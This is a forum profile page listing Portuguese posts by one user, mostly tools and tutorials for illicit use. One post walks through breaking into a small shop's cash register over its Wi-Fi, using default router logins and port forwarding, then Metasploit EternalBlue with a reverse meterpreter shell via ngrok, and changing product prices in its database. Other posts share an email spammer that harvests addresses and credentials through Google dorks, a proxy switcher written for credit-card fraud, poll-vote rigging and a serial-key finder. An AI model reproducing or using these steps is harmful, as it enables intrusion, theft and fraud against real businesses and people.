Jump to content

gusdnide

Members
  • Content Count

    9
  • Joined

  • Last visited

  • Days Won

    7

gusdnide last won the day on May 11

gusdnide had the most liked content!

Community Reputation

17 Good

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. Estava com problemas em um sistema para votar automatico em uma enquete, pois só podia 2 votos por IP, então desenvolvi essa tool para baixar listas de proxy que são atualizadas todos dias em um site terceiro, e usar esses proxys para fazer as requesiçoes no site alvo GitHub
  2. Eae galera desenvolvi uma ferramente que faz tenta encontrar aquele serial que voce tanto procura. Instalação: mkdir serialsearch cd serialsearch wget https://c209c0d.000webhostapp.com/serialsearch.zip unzip serialsearch.zip python3 -m pip install -r requirements.txt Instalaçao com uma linha: mkdir serialsearch && cd serialsearch && wget https://c209c0d.000webhostapp.com/serialsearch.zip && unzip serialsearch.zip && python3 -m pip install -r requirements.txt Como usar: python3 serialsearch.py ou python3 serialsearch.py NOME python3 serialsearch.py "NOME COM ESPAÇO" Exemplos: python3 serialsearch.py Camtasia python3 serialsearch.py "Adobe Photoshop" Tutorial ASCIInema: https://asciinema.org/a/wHTEsVsWkPMIrhT5fxFamtxAy
  3. Olá venho mostrar como fiz para entrar no computador do mercadinho remotamente, foi o primeiro passo antes deu alterar o preço do cigarro para 4 reais (antes era R$ 8,50 ja faz 5 dias e nada foi alterado ), Passos: Entrar na rede Mapear a rede & encontrar o caixa Encontrar vulnerabilidades Redirecionar portas do caixa para WAN Invaindo o caixa Passo 1 Como voce não vai poder simplesmente se conectar a LAN , o padrão é tentar fazer uma conexão por Wi-fi, no meu caso a rede tinha WPS ligado, então usando o WPS App para encontrar o pin da rede para que eu possa conectar, voce pode usar varias ferramentas para tentar fazer ter conexao num wifi, Passo 2 Utilizei um app chamado Network Scanner para fazer uma varredura na rede, com isso você pode pegar cada dispositivo conectado a rede, procure por computadores na rede, no meu caso só existe 1 caixa no mercadinho e com isso foi facil descobrir qual dos hosts era e lembre-se reconhecer o sistema que está rodando, se for Windows você tem mais chances de conceguir, aproveite e pegue também o endereço do Gateway no caso: 192.168.1.1 //Simulaçao Passo 3 Ainda no Network Scanner, verifique as portas do computador , verifique se existe alguma porta vulneravel, no meu caso a 445 pode ser vulneravel ao terrivel EternalBlue e como o mercado não é muito grande provavelmente não fazem atualizaçao o sistema no sistema, oque pode ser um error fatal não deixar seu sistema atualizado, Passo 4 Entre no navegador e entre no gateway (Geralmente 192.168.1.1 ou 192.168.0.1), provavelmente irá pedir login ou senha, você pode tentar usar o routersploit no android para poder encontrar o login e senha do roteador, mas você pode fazer testes rapidos em logins padroes (Lista abaixo) , assim que conceguiu acesso ao roteador você precisa liberar portas para o ip do caixa (lembre de redirecionar para o IP do caixa) geralmente uma pagina chamada Port Forwarding, achou? entao adicionar uma nova regra e Porta Publica (Public Port) use portas entre 1001-9999 pois a maioria dos scanners de portas scaneia de 1-1000 e em Porta Privada (Private Port) voce irá colocar a porta que se encontra uma possivel vulnerabilidade no meu caso 445 e no protocolo (protocol) voce coloca TCP , e aumentar a chance nenhuma outra pessoa achar esse caminho, caso tenho dificuldades para liberar portas no roteador aproveite a internet gratis e pesquisa como abrir portas usando o modelo do roteador (que pode ser facilmente encontrado fusando no painel) Logins padrao: admin admin admin (SENHA EM BRANCO) admin gvt12345 guest guest Passo 5 Antes de ir embora para casa aproveite e pegue o IP WAN da rede, facilmente encontrado no site: MyIP org ou MeuIP br, em casa já com o café do lado, abra um bloco de notas e grave suas informaçoes nela ex: 164.216.21.3:4444 -> 192.168.1.21:445, bom vamos ver se realmente é vulneravel ao ataque do eternalblue , abra o metasploit e use smb_ms17_010 para checar se é vulneravel, exemplo do meu caso: RHOSTS: 164.216.21.3 RPORT: 4444 comandos abaixo. msfconsole use auxiliary/scanner/smb/smb_ms17_010 set RHOSTS 164.216.21.3 set RPORT 4444 exploit caso o retorno ter Host is likely VULNERABLE to MS17-010! é vulneravel como no meu caso abaixo: [+] 164.216.21.3:4444 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit) [*] 164.216.21.3:4444 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed Boa agora vamos explorar essa vulnerabilidade use o exploit windows/smb/ms17_010_eternalblue para invadir, no meu exemplo irei usar o ngrok para fazer tunnel com o meu localhost (APRENDA USAR O NGROK AQUI ) utilizarei o payload windows/meterpreter/reverse_http use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 164.216.21.3 set RPORT 4444 set LHOST 0.tcp.ngrok.com set LPORT 46707 exploit Pronto, agora estude o computador, meus passos para alterar o banco de dados: Naveguei até a area de trabalho, verifiquei todos os links, e vi que tinha um chamado Sis comerce, baixei o executavel dele, decompilei ele com o .NET Reflector, verifiquei que ele faz conexão com o banco de dados da Microsoft SQL Server, usando o mono desenvolvi uma ferramenta para conectar no banco usando os dados que decompilei (Existe uma classe conectora do DB contendo host, user...) só apliquei a mesma coisa no mono, simplesmente atualizei o preço de todos os produtos com o nome "CIGARRO DE PALHA MINAS" para 4.00. Videos que podem ajudar:
  4. gusdnide

    routerscan

    Ola galera, venho compartilhar uma ferramenta que montei, para poder scanear uma certa range de ip, onde faz pesquisa por possíveis paginas de roteadores e serviços. em breve vou adicionar alguns possíveis exploits. Parâmetros i:range Range de IP ex (192.168.1.1/22) (requerido) m:mthread Maximo de threads. t:titulo Titulo a pesquisar (Exemplo: MikroTik) forcatitulo Mostrar apenas os que tem titulo na pagina log Gera um log.txt com todos os resultados. Exemplos: Ajuda: routerscan --ajuda Exemplos: routerscan -i 194.103.96.0/22 --forcatitulo --log -m 200 Download Release.zip Virustotal
  5. Spammer CLI Salve salve galera, estou aqui novamente com minhas ferramentas malucas rsrs, bom recentemente estava num trampo onde precisava spammar muito mais muitos emails mesmo, e todos sabem que ficar buscando lista de emails é muito foda, então desenvolvi essa ferramenta para fazer os spammers, e ela utiliza o proprio google para pesquisar os emails (é isso mesmo) utiliza uma dork feita por mim mesmo, e pode ser facilmente configurada no arquivo config.json, O programa é bem facil de configurar e usar! e Com um bonus de buscar Contas com o formato de EMAIL|SENHA ou EMAIL:SENHA Tutorial Apos extrair o programa, abra o arquivo config.json com o bloco de notas, o resultado deve parecer com isto: { "Email":"[email protected]", "Senha":"MINHASENHA", "Porta": 587, "DorkGoogle": "intext:\"@gmail.com\"+intext:\"@hotmail.com\"+\"intext:\"@yahoo.com.br\"", "Smtp": "smtp-mail.outlook.com", "MaxThreads" : 150 } Bom para configurar primeiramente coloque o seu email e senha nos devidos lugares, caso seu email não seja da hotmail, procure saber o Endereço e porta SMTP Aqui uma lista de servidores SMTP (Eu recomendo ir no hostinger e criar um servidor de email, mas caso n teja nesse patamar crie um email no google ou na hotmail) Lista AQUI Agora è so editar o body.html, que será o corpo do seu email (sim é aceitavel HTML) exemplo: <b>Voce</b><i> caiu no spam </i> do <b style="color: green;"> b1elzim </b> Apos isso simplesmente abra o programa, digite o assunto dos emails, e aproveite! ScreenShot Spammer.zip
  6. H2F Salve galera, vou deixar aqui uma aplicaçao que montei para onde você pode transformar suas aplicaçoes de HTMl\CSS\JS em um programa executavel, eu tivesse essa ideia quando tava no chuveiro kk então coloquei em pratica, é muito simples de usar, só cria sua aplicaçao em Web, e jogar a source na pasta chamada /src/site/ , é importante ter um arquivo chamado index.html para o programa ser compilado com sucesso! ScreenShots GitHUB Debug.zip
  7. Proxy Changer Salve galera, venho apresentar esse meu codigo velho que faziar para poder aprovar CC na netflix, pegava um Proxy do pais que desejava (mais precisamente uma lista) e trocava as configuraçoes globais do Windows de proxy, ou seja voce podia acessar qualquer navegador que o seu ip teria mudado!, vai ser bem simples apartir desse meu projeto desenvolvi algo maior que me ajuda até hoje, mas ainda falta alguns concertos ae quando tiver tudo OK eu posto aqui! Bom beleza vamos la , primeiro vamos chamar as bibliotecas que usaremos! using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; using System.Runtime.InteropServices; using Microsoft.Win32; using System.Net; using System.Threading; using System.IO; Ok, ja com as bibliotecas importadas, vamos adicionar nossas referencias que vamos chamar das API do windows ou especificamente da "wininet.dll" ok. #region Referencias [DllImport("wininet.dll")] public static extern bool InternetSetOption(IntPtr hInternet, int dwOption, IntPtr lpBuffer, int dwBufferLength); #endregion (Para saber mais sobre a funçao acima só acessar o site da Microsoft aqui ) Ok, agora vamos criar um metodo para chamar essa funçao de maneira correta na hora correta. static bool MudarProxy(string Proxy, bool Habilitar) { RegistryKey RegInternet = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", true); //Atribui a variavel RegInternet o registro onde fica as configuraçoes da internet no regedit RegInternet.SetValue("ProxyEnable", Habilitar); //Habilita o proxy RegInternet.SetValue("ProxyServer", Proxy); //Atribui o server proxy para o windows InternetSetOption(IntPtr.Zero, 0x27, IntPtr.Zero, 0); //Avisa o windows q ouve uma mudança nas configuraçoes da internet InternetSetOption(IntPtr.Zero, 0x25, IntPtr.Zero, 0); //Atualiza as configuraçoes da internet } Para mais flags do InternetSetOption pode ser visto aqui, ok agora é só desenvolver o programa outra funçao simples de se fazer para checar se o proxy está funcionando, é fazer um teste com ele, se o site não responder ou der algum error é por que não esta funcionando Veja o exemplo: static bool VerificarProxy(sProxy p) { HttpWebRequest wc = (HttpWebRequest)WebRequest.Create("http://google.com"); wc.Proxy = new WebProxy(p.IP, p.Port); wc.Timeout = 2000; try { wc.GetResponse(); return true; } catch { return false; } } O código do meu programa que fiz de teste: using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; using System.Runtime.InteropServices; using Microsoft.Win32; using System.Net; using System.Threading; using System.IO; namespace ProxyChange { class Program { #region Referencias [DllImport("wininet.dll")] public static extern bool InternetSetOption(IntPtr hInternet, int dwOption, IntPtr lpBuffer, int dwBufferLength); #endregion #region Metodos static bool MudarProxy(string Proxy, bool Habilitar) { RegistryKey registry = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", true); registry.SetValue("ProxyEnable", Habilitar); registry.SetValue("ProxyServer", Proxy); InternetSetOption(IntPtr.Zero, 0x27, IntPtr.Zero, 0); InternetSetOption(IntPtr.Zero, 0x25, IntPtr.Zero, 0); } static bool CheckContains(sProxy p) { foreach (sProxy p2 in ProxyTestados) if (p.getString() == p2.getString()) return true; return false; } static bool CheckProxy(sProxy p) { if (!CheckContains(p)) ProxyTestados.Add(p); else return false; HttpWebRequest wc = (HttpWebRequest)WebRequest.Create("http://google.com"); wc.Proxy = new WebProxy(p.IP, p.Port); wc.Timeout = 2000; try { wc.GetResponse(); return true; } catch { return false; } } #endregion #region Structs struct sProxy { public string IP { get; set; } public int Port { get; set; } public string getString() { return $"{IP}:{Port}"; } } #endregion static List<sProxy> ListProxy; static List<sProxy> ProxyFuncionando; static List<sProxy> ProxyTestados; static string Arquivo = ""; static int TempoTroca; [STAThread] static void Main(string[] args) { MudarProxy("", 0); Console.ForegroundColor = ConsoleColor.White; Console.Title = "Proxy Chaanger"; ProxyTestados = new List<sProxy>(); if (ListProxy == null) ListProxy = new List<sProxy>(); if (ProxyFuncionando == null) ProxyFuncionando = new List<sProxy>(); TempoTroca = 0; string Resp = ""; if (ListProxy.Count == 0) { Console.Write("Digite o nome do arquivo de proxys: "); Resp = Console.ReadLine(); if (!File.Exists(Resp)) { Console.WriteLine("Arquivo invalido!"); Console.ReadLine(); Console.Clear(); Main(args); return; } } Arquivo = Resp; LerProxys(); Console.Write("Digite quantos minutos para a troca de IP: "); Resp = Console.ReadLine(); if (int.TryParse(Resp, out TempoTroca)) { if (TempoTroca > 0 && TempoTroca < int.MaxValue) { TempoTroca *= 60000; } else { Console.WriteLine("Arquivo invalido!"); Console.ReadLine(); Console.Clear(); Main(args); return; } } else { Console.WriteLine("Arquivo invalido!"); Console.ReadLine(); Console.Clear(); Main(args); return; } new Thread(Rotina).Start(); Console.ReadLine(); MudarProxy("", 0); Environment.Exit(1); } static void LerProxys() { ListProxy.Clear(); foreach (string Linha in File.ReadAllLines(Arquivo)) { if (Linha.Contains(":")) { string[] Div = Linha.Split(':'); int Porta = -1; sProxy p; if (int.TryParse(Div[1], out Porta)) p = (new sProxy() { IP = Div[0], Port = Porta }); else continue; if (!ProxyTestados.Contains(p)) ListProxy.Add(p); } } } static void TestarProxys() { int count = 1; foreach (sProxy p in ListProxy) { Console.Clear(); Console.WriteLine("Testando Proxys..."); Console.WriteLine($"{ListProxy.Count} proxys carregados!"); Console.WriteLine($"Testando {count}/{ListProxy.Count} e {ProxyFuncionando.Count} estao funcionando!"); if (CheckProxy(p)) { ProxyFuncionando.Add(p); } count++; Thread.Sleep(200); } ListProxy.Clear(); } static void Rotina() { int Count = 0; while (true) { Console.Clear(); Console.WriteLine("Procurando Proxy Funcionando!"); Console.WriteLine("Aperte qualquer tecla para sair!"); while (CheckProxy(ListProxy[Count])) { Console.Clear(); Count++; if (Count == ListProxy.Count) { Console.WriteLine("Os Proxys acabaram!"); Console.WriteLine("Desligando proxy..."); MudarProxy("localhost", 0); Console.ReadLine(); return; } } Console.Clear(); sProxy AtualProxy = ListProxy[Count]; Console.WriteLine($"Proxy Atual: {AtualProxy.getString()}"); Console.WriteLine($"Proxima Troca: { DateTime.Now.AddMinutes(TempoTroca/60000).ToString() }"); Console.WriteLine("Aperte qualquer tecla para sair!"); MudarProxy(AtualProxy.getString(), 1); Thread.Sleep(TempoTroca); LerProxys(); } } } }
  8. filmes-cli Salve rapaziada, da minha serie de programas "-cli" kkk venho apresentar para vocês a minha outra ferramenta para stream de filmes, você faz a pesquisa ele puxa de um site as informações do filme e com apenas um click você pode fazer "Stream" desse filme, eu recomendaria o popcorn mas o popcorn só tem filmes legendados e os dublados as vezes não existe peers suficientes..., basicamente é isso, essa ferramenta foi Desenvolvido para buscar filmes em torrent, e fazer stream dele para que voce possa assistir seus filmes enquanto baixa!, você tambem pode assistir apartir de um .torrent! Requisitos nodeJS VLC peerlix PHP, eu no windows uso o xampp para gerenciar-lo Xampp Instalaçao Instalaçao Instalar todos softwares nescessarios Extrair "Upload.zip" (Download FIM do Topico) para a pasta do htdocs/ xampp ou /var/www/html no linux Ligar o apache no xampp ou iniciar o apache2 no terminal do linux Iniciar o programa Screen Shots Github (Poderiam ajudar e colocar suporte para outros sites de pesquisa!) Filmes-cli.zip Upload.zip
  9. Games-cli Ae galera, venho compartilhar com vocês uma ferramente que eu codei esses dias na madrugada, o motivo é porque estou cansado de entrar nos sites e terem varios anuncios ou links falsos, entao eu montei uma API de um dos maiores sites de Download de jogos , Fiz uma ferramenta onde indexa todos os posts de jogos, pega as informaçoes de cada jogo (Nome, Descriçao, Imagem, Trailer, Download Link...) e salva em um arquivo JSON, e com isso utilizando o programa, voce pode fazer uma rapida pesquisa de algum jogo seja no arquivo json ou uma pesquisa direto pelo site, utilizando os comandos do programa! ScreenShots Github
×
×
  • Create New...

Important Information

By using this site, you agree to our Terms of Use.